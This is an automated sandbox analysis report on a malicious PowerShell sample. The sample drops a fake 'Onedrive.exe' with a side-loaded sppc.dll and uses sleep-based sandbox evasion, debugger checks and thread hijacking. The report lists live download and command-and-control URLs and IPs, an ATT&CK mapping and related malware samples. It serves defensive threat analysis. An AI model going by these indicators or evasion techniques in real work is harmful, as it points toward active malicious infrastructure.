Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4661	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5211	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Window / User API: threadDelayed 2510	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Window / User API: threadDelayed 7478	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

API coverage: 5.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4164	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 5492	Thread sleep count: 2510 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 5492	Thread sleep time: -2510000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 5492	Thread sleep count: 7478 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 5492	Thread sleep time: -7478000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

3_2_00007FF8A0327470

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Code function: 3_2_00007FF8A031B9F0 GetSystemInfo,

3_2_00007FF8A031B9F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: powershell.exe, 00000000.00000002.2267385193.0000022F7F3AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWw
Source: powershell.exe, 00000000.00000002.2267385193.0000022F7F3AA000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3901525733.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137274150.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604797788.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323944839.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Onedrive.exe, 00000003.00000003.3901525733.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137274150.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604797788.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323944839.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW?
Source: Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Code function: 3_2_00007FF8A032D650 IsDebuggerPresent,Concurrency::details::UMSBackgroundPoller::~UMSBackgroundPoller,

3_2_00007FF8A032D650

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

3_2_00007FF8A0301010

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Code function: 3_2_00007FF6104FD98C GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

3_2_00007FF6104FD98C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104FEBD0 SetUnhandledExceptionFilter,	3_2_00007FF6104FEBD0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104FE8BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF6104FE8BC
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A0303190 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF8A0303190
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A0302830 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF8A0302830
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A031DC60 __crtCaptureCurrentContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF8A031DC60

HIPS / PFW / Operating System Protection Evasion

Sets debug register (to hijack the execution of another thread)

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Thread register set: 5036 1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe"

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Code function: 3_2_00007FF8A033E310 cpuid

3_2_00007FF8A033E310

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Code function: 3_2_00007FF6104FEDA4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

3_2_00007FF6104FEDA4

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Code function: 3_2_00007FF6104F1F10 StrToID,?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z,?AddListener@Element@DirectUI@@QEAAJPEAUIElementListener@2@@Z,

3_2_00007FF6104F1F10

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	111 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	111 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	21 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	24 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
g1.ps1	0%	ReversingLabs
g1.ps1	0%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Onedrive.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\sppc.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://47.84.196.148/	0%	Avira URL Cloud	safe
https://bangla.b-cdn.net/sppc.dll	0%	Avira URL Cloud	safe
https://47.84.196.148/V	0%	Avira URL Cloud	safe
https://47.84.196.148/o	0%	Avira URL Cloud	safe
http://bangla.b-cdn.net/onedrive.dll	0%	Avira URL Cloud	safe
http://bangla.b-cdn.net/sppc.dll	0%	Avira URL Cloud	safe
https://47.84.196.148/reports	0%	Avira URL Cloud	safe
https://47.84.196.148/reportsX	0%	Avira URL Cloud	safe
http://bangla.b-cdn.net	0%	Avira URL Cloud	safe
https://47.84.196.148:443/reports	0%	Avira URL Cloud	safe
https://47.84.196.148/reportsF	0%	Avira URL Cloud	safe
https://47.84.196.148/reports=	0%	Avira URL Cloud	safe
https://47.84.196.148/GZ;~	0%	Avira URL Cloud	safe
https://bangla.b-cdn.net/onedrive.dll	0%	Avira URL Cloud	safe
https://bangla.b-cdn.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bangla.b-cdn.net	89.35.237.170	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bangla.b-cdn.net/sppc.dll	false	Avira URL Cloud: safe	unknown
https://47.84.196.148/reports	true	Avira URL Cloud: safe	unknown
http://bangla.b-cdn.net/onedrive.dll	false	Avira URL Cloud: safe	unknown
https://bangla.b-cdn.net/onedrive.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://47.84.196.148/V	Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2256795044.0000022F101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.mic	Onedrive.exe	false		high
https://47.84.196.148/	Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604709979.0000021BD8DD3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000000.00000002.2238529101.0000022F014D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://47.84.196.148/reportsX	Onedrive.exe, 00000003.00000003.3136786618.0000021BD8DCA000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.2965471763.0000021BD8DC7000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137481473.0000021BD8DCD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000000.00000002.2266730581.0000022F7F1A0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bangla.b-cdn.net	powershell.exe, 00000000.00000002.2238529101.0000022F0195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F016B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01942000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://47.84.196.148/o	Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://47.84.196.148:443/reports	Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bangla.b-cdn.net/sppc.dll	powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://47.84.196.148/reports=	Onedrive.exe, 00000003.00000002.4567512777.0000021BD8DB0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2256795044.0000022F101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmp	false		high
https://47.84.196.148/GZ;~	Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://47.84.196.148/reportsF	Onedrive.exe, 00000003.00000003.4324280737.0000021BD8DAF000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323820077.0000021BD8D9E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2238529101.0000022F00001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bangla.b-cdn.net	powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01942000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2238529101.0000022F00001000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.35.237.170	bangla.b-cdn.net	Romania		34304	TEENTELECOMRO	false
47.84.196.148	unknown	United States		3209	VODANETInternationalIP-BackboneofVodafoneDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578250
Start date and time:	2024-12-19 13:35:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	g1.ps1
Detection:	MAL
Classification:	mal60.evad.winPS1@4/8@1/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 98% Number of executed functions: 16 Number of non-executed functions: 180
Cookbook Comments:	Found application associated with file extension: .ps1 Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5324 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:36:08	API Interceptor	43x Sleep call for process: powershell.exe modified
07:36:19	API Interceptor	11514376x Sleep call for process: Onedrive.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
89.35.237.170	Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk	Get hash	malicious	Unknown	Browse	bangla.b-cdn.net/sppc.dll
47.84.196.148	Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bangla.b-cdn.net	Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk	Get hash	malicious	Unknown	Browse	89.35.237.170

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TEENTELECOMRO	Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk	Get hash	malicious	Unknown	Browse	89.35.237.170
	https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=	Get hash	malicious	Unknown	Browse	89.35.237.170
	https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f	Get hash	malicious	Unknown	Browse	89.35.237.170
	http://home45insurance.blogspot.com	Get hash	malicious	Unknown	Browse	89.35.237.170
	http://home45insurance.blogspot.com	Get hash	malicious	Unknown	Browse	89.35.237.170
	https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com	Get hash	malicious	HTMLPhisher	Browse	89.35.237.170
	https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwE	Get hash	malicious	PureLog Stealer	Browse	89.35.237.170
	https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.com	Get hash	malicious	HTMLPhisher	Browse	89.35.237.170
	https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.html	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse	89.35.237.170
	https://shorturl.at/aRqLH/	Get hash	malicious	Unknown	Browse	89.35.237.170
VODANETInternationalIP-BackboneofVodafoneDE	Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk	Get hash	malicious	Unknown	Browse	47.84.196.148
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	47.84.100.146
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	88.69.110.109
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	88.72.154.222
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	178.9.13.231
	la.bot.sparc.elf	Get hash	malicious	Mirai	Browse	88.67.178.149
	la.bot.arm.elf	Get hash	malicious	Mirai	Browse	109.46.80.93
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	94.218.243.142
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	2.205.237.167
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	139.7.173.41

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk	Get hash	malicious	Unknown	Browse	47.84.196.148
	invoice.html	Get hash	malicious	Unknown	Browse	47.84.196.148
	BjLxqVU7m4.dll	Get hash	malicious	Unknown	Browse	47.84.196.148
	Ne7qNMCeuy.exe	Get hash	malicious	Unknown	Browse	47.84.196.148
	Q7I4ToJZ0R.exe	Get hash	malicious	Unknown	Browse	47.84.196.148
	BjLxqVU7m4.dll	Get hash	malicious	Unknown	Browse	47.84.196.148
	Ne7qNMCeuy.exe	Get hash	malicious	Unknown	Browse	47.84.196.148
	Q7I4ToJZ0R.exe	Get hash	malicious	Unknown	Browse	47.84.196.148
	LgigaSKsL6.exe	Get hash	malicious	SmokeLoader	Browse	47.84.196.148
	file.exe	Get hash	malicious	SmokeLoader	Browse	47.84.196.148
3b5074b1b5d032e5620f69f9f700ff0e	Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk	Get hash	malicious	Unknown	Browse	89.35.237.170
	LbtytfWpvx.vbs	Get hash	malicious	Remcos	Browse	89.35.237.170
	YinLHGpoX4.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	89.35.237.170
	raEyjKggAf.ps1	Get hash	malicious	Unknown	Browse	89.35.237.170
	gCXzb0K8Ci.ps1	Get hash	malicious	Unknown	Browse	89.35.237.170
	H2PspQWoHE.ps1	Get hash	malicious	Unknown	Browse	89.35.237.170
	0iTxQouy7k.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	89.35.237.170
	H6epOhxoPY.ps1	Get hash	malicious	Unknown	Browse	89.35.237.170
	KcKtHBkskI.ps1	Get hash	malicious	Unknown	Browse	89.35.237.170
	1M1QoJF40r.ps1	Get hash	malicious	Unknown	Browse	89.35.237.170

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\sppc.dll	Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\Onedrive.exe	Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulDm0ll//Z:NllU6cl/
MD5:	DA1F22117B9766A1F0220503765A5BA5
SHA1:	D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
SHA-256:	BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
SHA-512:	520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................R..............@..........

C:\Users\user\AppData\Local\Temp\Onedrive.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	110536
Entropy (8bit):	6.479810480369939
Encrypted:	false
